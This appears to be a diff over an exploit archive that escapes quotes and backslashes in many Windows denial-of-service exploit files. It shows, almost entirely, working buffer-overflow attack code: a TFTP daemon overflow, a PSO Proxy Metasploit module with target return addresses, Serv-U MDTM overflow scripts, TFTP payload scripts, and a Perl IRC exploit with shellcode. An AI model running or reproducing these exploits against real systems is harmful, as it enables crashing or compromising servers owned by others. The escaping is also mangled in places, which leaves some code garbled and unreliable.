-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\0"
+\"\\0\"
-"netascii"
+\"netascii\"
-"\0";
+\"\\0\";
 void main(int argc, char *argv[])
 {
@ -62,52 +62,52 @@ SOCKET mysocket;
 int destPORT = 69;
 if (argc < 2){
-printf("\nVulnerability: Remote Buffer Overflow Exploit\n");
+printf(\"\\nVulnerability: Remote Buffer Overflow Exploit\\n\");
-printf("Impact: Remote Denial of Service Attack\n");
+printf(\"Impact: Remote Denial of Service Attack\\n\");
-printf("Vulnerable Application: TFTP Daemon Version 1.9\n");
+printf(\"Vulnerable Application: TFTP Daemon Version 1.9\\n\");
-printf("\nAuthor: Socket_0x03\n");
+printf(\"\\nAuthor: Socket_0x03\\n\");
-printf("Contact: Socket_0x03 (at) teraexe (dot) com [email concealed]\n");
+printf(\"Contact: Socket_0x03 (at) teraexe (dot) com [email concealed]\\n\");
-printf("Website: www.teraexe.com\n");
+printf(\"Website: www.teraexe.com\\n\");
-printf("\nUsage: exploit + IP Address\n");
+printf(\"\\nUsage: exploit + IP Address\\n\");
-printf("Example: exploit 192.168.1.100\n");
+printf(\"Example: exploit 192.168.1.100\\n\");
 return;
 }
 wVersionRequested = MAKEWORD(1, 1);
 if (WSAStartup(wVersionRequested, &wsaData) < 0) {
-printf("No winsock suitable version found!");
+printf(\"No winsock suitable version found!\");
 return;
 }
 mysocket = socket(AF_INET, SOCK_DGRAM , 0);
 if(mysocket==INVALID_SOCKET){
-printf("Error: Cannot create a socket.\n");
+printf(\"Error: Cannot create a socket.\\n\");
 exit(1);
 }
-printf("Resolving IP Address.\n");
+printf(\"Resolving IP Address.\\n\");
 if ((pTarget = gethostbyname(argv[2])) == NULL){
-printf("Error: Resolve of %s failed.\n", argv[1]);
+printf(\"Error: Resolve of %s failed.\\n\", argv[1]);
 exit(1);
 }
 memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
 sock.sin_family = AF_INET;
 sock.sin_port = htons(destPORT);
-printf("Connecting to Daemon 1.9\n");
+printf(\"Connecting to Daemon 1.9\\n\");
 if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
-printf("Error: Could not connect to TFTP Daemon\n");
+printf(\"Error: Could not connect to TFTP Daemon\\n\");
 exit(1);
 }
-printf("Connection Completed.\n");
+printf(\"Connection Completed.\\n\");
 Sleep(10);
-printf("Sending packet.\n");
+printf(\"Sending packet.\\n\");
 if (send(mysocket,Buffer_Overflow, sizeof(Buffer_Overflow)+1, 0) == -1){
-printf("Error sending packet.\n");
+printf(\"Error sending packet.\\n\");
 closesocket(mysocket);
 exit(1);
 }
-printf("Remote Buffer Overflow Completed.\n");
+printf(\"Remote Buffer Overflow Completed.\\n\");
 closesocket(mysocket);
 WSACleanup();
@ -117,7 +117,7 @@ WSACleanup();
 Microsoft Windows XP [Versión 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.
-C:\>exploit
+C:\\>exploit
 Vulnerability: Remote Buffer Overflow Exploit
 Impact: Remote Denial of Service Attack
@ -130,12 +130,12 @@ Website: www.teraexe.com
 Usage: exploit + IP Address
 Example: exploit 192.168.1.100
-C:\>exploit 192.168.1.101
+C:\\>exploit 192.168.1.101
 Resolving IP Address.
 Connecting to Daemon 1.9
 Connection Completed.
 Sending packet.
 Remote Buffer Overflow Completed.
-C:\>
+C:\\>
 */
--- a/platforms/windows/dos/16790.rb
+++ b/platforms/windows/dos/16790.rb
@ -18,43 +18,43 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'PSO Proxy v0.91 Stack Buffer Overflow',
+			\'Name\'           => \'PSO Proxy v0.91 Stack Buffer Overflow\',
-			'Description'    => %q{
+			\'Description\'    => %q{
 				This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
 				If a client sends an excessively long string the stack is overwritten.
 			},
-			'Author'         => 'Patrick Webster <patrick@aushack.com>',
+			\'Author\'         => \'Patrick Webster <patrick@aushack.com>\',
-			'License'        => MSF_LICENSE,
+			\'License\'        => MSF_LICENSE,
-			'Version'        => '$Revision: 9262 $',
+			\'Version\'        => \'$Revision: 9262 $\',
-			'References'     =>
+			\'References\'     =>
 				[
-					[ 'CVE', '2004-0313' ],
+					[ \'CVE\', \'2004-0313\' ],
-					[ 'OSVDB', '4028' ],
+					[ \'OSVDB\', \'4028\' ],
-					[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
+					[ \'URL\', \'http://www.milw0rm.com/exploits/156\' ],
-					[ 'BID', '9706' ],
+					[ \'BID\', \'9706\' ],
 				],
-			'DefaultOptions' =>
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'thread',
+					\'EXITFUNC\' => \'thread\',
 				},
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'Space'    => 370,
+					\'Space\'    => 370,
-					'BadChars' => "\x00\x0a\x0d\x20",
+					\'BadChars\' => \"\\x00\\x0a\\x0d\\x20\",
-					'StackAdjustment' => -3500,
+					\'StackAdjustment\' => -3500,
 				},
-			'Platform'       => 'win',
+			\'Platform\'       => \'win\',
-			'Targets'        =>
+			\'Targets\'        =>
 				[
 				# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
-					[ 'Windows 2000 Pro SP0-4 English',  { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
+					[ \'Windows 2000 Pro SP0-4 English\',  { \'Ret\' => 0x75023112 } ], # call ecx ws2help.dll
-					[ 'Windows 2000 Pro SP0-4 French',   { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
+					[ \'Windows 2000 Pro SP0-4 French\',   { \'Ret\' => 0x74fa3112 } ], # call ecx ws2help.dll
-					[ 'Windows 2000 Pro SP0-4 Italian',  { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
+					[ \'Windows 2000 Pro SP0-4 Italian\',  { \'Ret\' => 0x74fd3112 } ], # call ecx ws2help.dll
-					[ 'Windows XP Pro SP0/1 English',    { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
+					[ \'Windows XP Pro SP0/1 English\',    { \'Ret\' => 0x71aa396d } ], # call ecx ws2help.dll
-					[ 'Windows XP Pro SP2 English',	     { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
+					[ \'Windows XP Pro SP2 English\',	     { \'Ret\' => 0x71aa3de3 } ], # call ecx ws2help.dll
 				],
-			'Privileged'     => false,
+			\'Privileged\'     => false,
-			'DisclosureDate' => 'Feb 20 2004'
+			\'DisclosureDate\' => \'Feb 20 2004\'
 			))
 		register_options(
@ -65,9 +65,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		connect
-		sock.put("GET / HTTP/1.0\r\n\r\n")
+		sock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\")
 		banner = sock.get(-1,3)
-		if (banner =~ /PSO Proxy 0\.9/)
+		if (banner =~ /PSO Proxy 0\\.9/)
 			return Exploit::CheckCode::Vulnerable
 		end
 		return Exploit::CheckCode::Safe
@ -77,9 +77,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		connect
 		exploit = rand_text_alphanumeric(1024, payload_badchars)
-		exploit += [target['Ret']].pack('V') + payload.encoded
+		exploit += [target[\'Ret\']].pack(\'V\') + payload.encoded
-		sock.put(exploit + "\r\n\r\n")
+		sock.put(exploit + \"\\r\\n\\r\\n\")
 		disconnect
 		handler
--- a/platforms/windows/dos/23760.pl
+++ b/platforms/windows/dos/23760.pl
@ -11,25 +11,25 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
 ## I do not take responsibility for the use of this code
 use IO::Socket qw(:DEFAULT :crlf);
-print "Serv-u MDTM Buffer overflow - by saintjmf\n";
+print \"Serv-u MDTM Buffer overflow - by saintjmf\\n\";
 ## Get Host port unsername and password
-my $host = shift || die print "\nUsage: <program> <Host> <port> <username> <password>\n";
+my $host = shift || die print \"\\nUsage: <program> <Host> <port> <username> <password>\\n\";
-my $port = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n";
+my $port = shift || die print \"\\nUsage: <program> <Host> <port> <username> <password> \\n\";
-$username = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n"; 
+$username = shift || die print \"\\nUsage: <program> <Host> <port> <username> <password> \\n\"; 
-$password = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n";
+$password = shift || die print \"\\nUsage: <program> <Host> <port> <username> <password> \\n\";
 ## Create Socket
-my $socket = IO::Socket::INET->new("$host:$port")  or die print "\nUnable to connect -- $!\n";
+my $socket = IO::Socket::INET->new(\"$host:$port\")  or die print \"\\nUnable to connect -- $!\\n\";
-print "connecting...............\n\n";
+print \"connecting...............\\n\\n\";
 connecter($socket);
-print "Server should be stopped\n";
+print \"Server should be stopped\\n\";
 ## Sub that sends username, password and exploit
@ -39,20 +39,20 @@ sub connecter{
 	my $socket2 = shift;
 	my $message2 = <$socket2>;
 	chomp $message2;
-	print "$message2\n";
+	print \"$message2\\n\";
 	sleep(5);
-	print $socket2 "user $username",CRLF;
+	print $socket2 \"user $username\",CRLF;
 	$message2 = <$socket2>;
 	chomp $message2;
-	print "$message2\n";
+	print \"$message2\\n\";
 sleep (5);
-	print $socket2 "pass $password", CRLF;
+	print $socket2 \"pass $password\", CRLF;
 	$message2 = <$socket2>;
 	chomp $message2;
-	print "$message2\n";
+	print \"$message2\\n\";
 sleep (4);
-	print "Sending MDTM Overflow.....\n";
+	print \"Sending MDTM Overflow.....\\n\";
-	print $socket2 "MDTM 20041111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt" ,CRLF;
+	print $socket2 \"MDTM 20041111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt\" ,CRLF;
 }
--- a/platforms/windows/dos/23761.c
+++ b/platforms/windows/dos/23761.c
@ -4,7 +4,7 @@ Serv-U FTP Server has been reported prone to a remote stack based buffer overflo
 The problem exists due to insufficient bounds checking. Ultimately an attacker may leverage this issue to have arbitrary instructions executed in the context of the SYSTEM user.
-/* serv-u-mdtm-expl.c - Serv-U "MDTM" buffer overflow PoC DoS exploit.
+/* serv-u-mdtm-expl.c - Serv-U \"MDTM\" buffer overflow PoC DoS exploit.
 *
 * This program will send an overly large filename parameter when calling
 * the Serv-U FTP MDTM command.  Although arbitrary code execution is
@ -34,9 +34,9 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
 int main(int argc, char *argv[]) {
        if(argc < 5) {
-                printf("Serv-U 'MDTM' buffer overflow DoS exploit.\n");
+                printf(\"Serv-U \'MDTM\' buffer overflow DoS exploit.\\n\");
-                printf("by shaun2k2 - <shaunige@yahoo.co.uk>.\n\n");
+                printf(\"by shaun2k2 - <shaunige@yahoo.co.uk>.\\n\\n\");
-                printf("Usage: %s <host> <port> <login> <password>\n", argv[0]);
+                printf(\"Usage: %s <host> <port> <login> <password>\\n\", argv[0]);
                exit(-1);
        }
@ -50,13 +50,13 @@ int main(int argc, char *argv[]) {
        /* lookup IP address of supplied hostname. */
        if((he = gethostbyname(argv[1])) == NULL) {
-                printf("Couldn't resolve %s!\n", argv[1]);
+                printf(\"Couldn\'t resolve %s!\\n\", argv[1]);
                exit(-1);
        }
        /* create socket. */
        if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
-                perror("socket()");
+                perror(\"socket()\");
                exit(-1);
        }
@ -65,26 +65,26 @@ int main(int argc, char *argv[]) {
        dest.sin_port = htons(atoi(argv[2]));
        dest.sin_addr = *((struct in_addr *)he->h_addr);
-        printf("Serv-U 'MDTM' buffer overflow DoS exploit.\n");
+        printf(\"Serv-U \'MDTM\' buffer overflow DoS exploit.\\n\");
-        printf("by shaun2k2 - <shaunige@yahoo.co.uk>.\n\n");
+        printf(\"by shaun2k2 - <shaunige@yahoo.co.uk>.\\n\\n\");
-        printf("Crafting exploit buffer...\n\n");
+        printf(\"Crafting exploit buffer...\\n\\n\");
        /* craft exploit buffers. */
-        memset(bigbuf, 'a', 6000);
+        memset(bigbuf, \'a\', 6000);
-        sprintf(loginbuf, "USER %s\n", argv[3]);
+        sprintf(loginbuf, \"USER %s\\n\", argv[3]);
-        sprintf(passwdbuf, "PASS %s\n", argv[4]);
+        sprintf(passwdbuf, \"PASS %s\\n\", argv[4]);
-        sprintf(explbuf, "MDTM 20031111111111+%s\r\n", bigbuf);
+        sprintf(explbuf, \"MDTM 20031111111111+%s\\r\\n\", bigbuf);
-        printf("[+] Connecting...\n");
+        printf(\"[+] Connecting...\\n\");
        if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) < 0) {
-                perror("connect()");
+                perror(\"connect()\");
                exit(-1);
        }
-        printf("[+] Connected!\n\n");
+        printf(\"[+] Connected!\\n\\n\");
-        printf("[+] Sending exploit buffers...\n");
+        printf(\"[+] Sending exploit buffers...\\n\");
        sleep(1); /* give the serv-u server time to sort itself out. */
        send(sock, loginbuf, strlen(loginbuf), 0);
        sleep(2); /* wait for 2 secs. */
@ -92,11 +92,11 @@ int main(int argc, char *argv[]) {
        sleep(2); /* wait before sending large MDTM command. */
        send(sock, explbuf, strlen(explbuf), 0);
        sleep(1); /* wait before closing the socket. */
-        printf("[+] Exploit buffer sent!\n\n");
+        printf(\"[+] Exploit buffer sent!\\n\\n\");
        close(sock);
-        printf("[+] Done!  Check if the Serv-U server has crashed.\n");
+        printf(\"[+] Done!  Check if the Serv-U server has crashed.\\n\");
        return(0);
 }
--- a/platforms/windows/dos/23762.c
+++ b/platforms/windows/dos/23762.c
@ -4,7 +4,7 @@ Serv-U FTP Server has been reported prone to a remote stack based buffer overflo
 The problem exists due to insufficient bounds checking. Ultimately an attacker may leverage this issue to have arbitrary instructions executed in the context of the SYSTEM user.
-/* serv-u-mdtm-expl.c - Serv-U "MDTM" buffer overflow
+/* serv-u-mdtm-expl.c - Serv-U \"MDTM\" buffer overflow
 PoC DoS exploit.
 *
 * This program will send an overly large filename
@ -45,12 +45,12 @@ login and password.
 int main(int argc, char *argv[]) {
        if(argc < 5) {
-                printf("Serv-U 'MDTM' buffer overflow
+                printf(\"Serv-U \'MDTM\' buffer overflow
-DoS exploit.\n");
+DoS exploit.\\n\");
-                printf("by shaun2k2 -
+                printf(\"by shaun2k2 -
-<shaunige@yahoo.co.uk>.\n\n");
+<shaunige@yahoo.co.uk>.\\n\\n\");
-                printf("Usage: %s <host> <port>
+                printf(\"Usage: %s <host> <port>
-<login> <password>\n", argv[0]);
+<login> <password>\\n\", argv[0]);
                exit(-1);
        }
@ -63,7 +63,7 @@ DoS exploit.\n");
        /* lookup IP address of supplied hostname. */
        if((he = gethostbyname(argv[1])) == NULL) {
-                printf("Couldn't resolve %s!\n",
+                printf(\"Couldn\'t resolve %s!\\n\",
 argv[1]);
                exit(-1);
        }
@ -71,7 +71,7 @@ argv[1]);
        /* create socket. */
        if((sock = socket(AF_INET, SOCK_STREAM, 0)) <
 0) {
-                perror("socket()");
+                perror(\"socket()\");
                exit(-1);
        }
@ -81,29 +81,29 @@ argv[1]);
        dest.sin_addr = *((struct in_addr
 *)he->h_addr);
-        printf("Serv-U 'MDTM' buffer overflow DoS
+        printf(\"Serv-U \'MDTM\' buffer overflow DoS
-exploit.\n");
+exploit.\\n\");
-        printf("by shaun2k2 -
+        printf(\"by shaun2k2 -
-<shaunige@yahoo.co.uk>.\n\n");
+<shaunige@yahoo.co.uk>.\\n\\n\");
-        printf("Crafting exploit buffer...\n\n");
+        printf(\"Crafting exploit buffer...\\n\\n\");
        /* craft exploit buffers. */
-        sprintf(loginbuf, "USER %s\n", argv[3]);
+        sprintf(loginbuf, \"USER %s\\n\", argv[3]);
-        sprintf(passwdbuf, "PASS %s\n", argv[4]);
+        sprintf(passwdbuf, \"PASS %s\\n\", argv[4]);
-        explbuf = "MDTM
+        explbuf = \"MDTM
-20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.txt";
+20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.txt\";
-        printf("[+] Connecting...\n");
+        printf(\"[+] Connecting...\\n\");
        if(connect(sock, (struct sockaddr *)&dest,
 sizeof(struct sockaddr)) < 0) {
-                perror("connect()");
+                perror(\"connect()\");
                exit(-1);
        }
-        printf("[+] Connected!\n\n");
+        printf(\"[+] Connected!\\n\\n\");
-        printf("[+] Sending exploit buffers...\n");
+        printf(\"[+] Sending exploit buffers...\\n\");
        sleep(1); /* give the serv-u server time to
 sort itself out. */
        send(sock, loginbuf, strlen(loginbuf), 0);
@ -114,12 +114,12 @@ command. */
        send(sock, explbuf, strlen(explbuf), 0);
        sleep(1); /* wait before closing the socket.
 */
-        printf("[+] Exploit buffer sent!\n\n");
+        printf(\"[+] Exploit buffer sent!\\n\\n\");
        close(sock);
-        printf("[+] Done!  Check if the Serv-U server
+        printf(\"[+] Done!  Check if the Serv-U server
-has crashed.\n");
+has crashed.\\n\");
        return(0);
 }
--- a/platforms/windows/dos/24952.py
+++ b/platforms/windows/dos/24952.py
@ -17,31 +17,31 @@
 #!/usr/bin/python
 import socket
 import sys
-host = '192.168.1.32'
+host = \\\'192.168.1.32\\\'
 port = 69
-nseh="\xCC\xCC\xCC\xCC"
+nseh=\\\"\\\\xCC\\\\xCC\\\\xCC\\\\xCC\\\"
 #seh handler overwritten at 261 byte of shellcode but to exception triggered to use it.
-seh="\x18\x0B\x27" # Breakpoint in no SafeSEH space in Windows XP SP3
+seh=\\\"\\\\x18\\\\x0B\\\\x27\\\" # Breakpoint in no SafeSEH space in Windows XP SP3
-payload="\xCC"*257 + nseh + seh + "\x00" + "3137" + "\x00"
+payload=\\\"\\\\xCC\\\"*257 + nseh + seh + \\\"\\\\x00\\\" + \\\"3137\\\" + \\\"\\\\x00\\\"
 #payload to get access violation:
-#payload=("\x00\x01\x25\x32\x35\x25"
+#payload=(\\\"\\\\x00\\\\x01\\\\x25\\\\x32\\\\x35\\\\x25\\\"
-#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
+#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
-#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
+#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
-#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
+#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
-#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
+#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
-#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
+#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
-#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
+#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
-#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x35"
+#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x35\\\"
-#"\x63\x65\x74\x63\x25\x32\x35\x35\x63\x68\x6f\x73\x74\x73\x00\x6e"
+#\\\"\\\\x63\\\\x65\\\\x74\\\\x63\\\\x25\\\\x32\\\\x35\\\\x35\\\\x63\\\\x68\\\\x6f\\\\x73\\\\x74\\\\x73\\\\x00\\\\x6e\\\"
-#"\x00")
+#\\\"\\\\x00\\\")
-buffer="\x00\x01"+  payload + "\x06" + "netascii" + "\x00"
+buffer=\\\"\\\\x00\\\\x01\\\"+  payload + \\\"\\\\x06\\\" + \\\"netascii\\\" + \\\"\\\\x00\\\"
 s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
--- a/platforms/windows/dos/26010.py
+++ b/platforms/windows/dos/26010.py
@ -14,12 +14,12 @@ from socket import *
 import sys
 import select
-pwn = "\x00\x02"
+pwn = \"\\x00\\x02\"
-pwn += "\x66\x69\x6c\x65\x2e\x74\x78\x74\x00"
+pwn += \"\\x66\\x69\\x6c\\x65\\x2e\\x74\\x78\\x74\\x00\"
-pwn += "A"*1200
+pwn += \"A\"*1200
-pwn += "\x00"
+pwn += \"\\x00\"
-address = ('192.168.200.20', 69)
+address = (\'192.168.200.20\', 69)
 server_socket = socket(AF_INET, SOCK_DGRAM)
 server_socket.sendto(pwn, address)
--- a/platforms/windows/dos/2855.py
+++ b/platforms/windows/dos/2855.py
@ -17,7 +17,7 @@
 # A vulnerability has been identified in 3CTftpSvc TFTP Server, which could be exploited by attackers 
 # to execute arbitrary commands or cause a denial of service. This flaw is 
 # due to a buffer overflow error when handling an overly long transporting 
-# mode (more than 470 bytes) passed to a "GET" or "PUT" command, which could 
+# mode (more than 470 bytes) passed to a \"GET\" or \"PUT\" command, which could 
 # be exploited by malicious users to compromise a vulnerable system or crash 
 # an affected application.
@ -26,18 +26,18 @@
 import socket
 import sys
-host = '192.168.1.11'
+host = \'192.168.1.11\'
 port = 69
 try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 except:
-   print "socket() failed"
+   print \"socket() failed\"
   sys.exit(1)
-filename = "A"
+filename = \"A\"
-mode = "netascii" + "A" * 469
+mode = \"netascii\" + \"A\" * 469
-da = "\x00\x02" + filename + "\0" + mode + "\0"
+da = \"\\x00\\x02\" + filename + \"\\0\" + mode + \"\\0\"
 s.sendto(da, (host, port))
 # milw0rm.com [2006-11-27]
--- a/platforms/windows/dos/29285.txt
+++ b/platforms/windows/dos/29285.txt
@ -2,7 +2,7 @@ source: http://www.securityfocus.com/bid/21612/info
 Multiple applications are prone to a denial-of-service vulnerability.
-A remote attacker may exploit this vulnerability by presenting malicious 'WMV', 'MID', and 'AVI' files to a victim user. When an affected application processes this image, the application crashes, effectively denying service.
+A remote attacker may exploit this vulnerability by presenting malicious \'WMV\', \'MID\', and \'AVI\' files to a victim user. When an affected application processes this image, the application crashes, effectively denying service.
 It is not known at this time if this issue can be leveraged to execute arbitrary code; this BID will be updated as further information becomes available.
--- a/platforms/windows/dos/29721.pl
+++ b/platforms/windows/dos/29721.pl
@ -14,20 +14,20 @@ An attacker can exploit these issues to execute arbitrary code within the contex
 use Socket;
-$retPtr = "\x60\xef\xff\xbf";
+$retPtr = \"\\x60\\xef\\xff\\xbf\";
 # Pirated from some guy called gunslinger_
-$exit1code = "\x31\xc0\xb0\x01\x31\xdb\xcd\x80";
+$exit1code = \"\\x31\\xc0\\xb0\\x01\\x31\\xdb\\xcd\\x80\";
-$code = "\x90" x 120 . $exit1code . $retPtr;
+$code = \"\\x90\" x 120 . $exit1code . $retPtr;
-socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "Couldn't open socket";
+socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\"tcp\")) or die \"Couldn\'t open socket\";
-bind(SOCKET, sockaddr_in(6667, inet_aton("127.0.0.1"))) or die "Couldn't bind to port 6667";
+bind(SOCKET, sockaddr_in(6667, inet_aton(\"127.0.0.1\"))) or die \"Couldn\'t bind to port 6667\";
-listen(SOCKET,5) or die "Couldn't listen on port";
+listen(SOCKET,5) or die \"Couldn\'t listen on port\";
 while(accept(CLIENT,SOCKET)){
    sleep 1;
    select((select(CLIENT), $|=1)[0]);
-    print CLIENT ":-psyBNC!~cjd\@ef.net PRIVMSG luser : :($code\r\n";
+    print CLIENT \":-psyBNC!~cjd\\@ef.net PRIVMSG luser : :($code\\r\\n\";
 }
 close(SOCKET);
--- a/platforms/windows/dos/3127.c
+++ b/platforms/windows/dos/3127.c
@ -11,10 +11,10 @@
 *Coded by Marsu <Marsupilamipowa@hotmail.fr>                            *
 ************************************************************************/
-#include "winsock2.h"
+#include \"winsock2.h\"
-#include "stdio.h"
+#include \"stdio.h\"
-#include "stdlib.h"
+#include \"stdlib.h\"
-#pragma comment(lib, "ws2_32.lib")
+#pragma comment(lib, \"ws2_32.lib\")
 int main(int argc, char* argv[])
 {
@ -28,58 +28,58 @@ int main(int argc, char* argv[])
 	if (argc!=3)
 	{
-		printf("[+] Usage: %s <ip> <port>\n",argv[0]);
+		printf(\"[+] Usage: %s <ip> <port>\\n\",argv[0]);
 		return 1;
 	}
 	WSACleanup();
 	WSAStartup(MAKEWORD(2,0),&wsa);
-	printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]);
+	printf(\"[+] Connecting to %s:%s ... \",argv[1],argv[2]);
 	if ((he=gethostbyname(argv[1])) == NULL) {
-		printf("Failed\n[-] Could not init gethostbyname\n");
+		printf(\"Failed\\n[-] Could not init gethostbyname\\n\");
 		return 1;
 	}
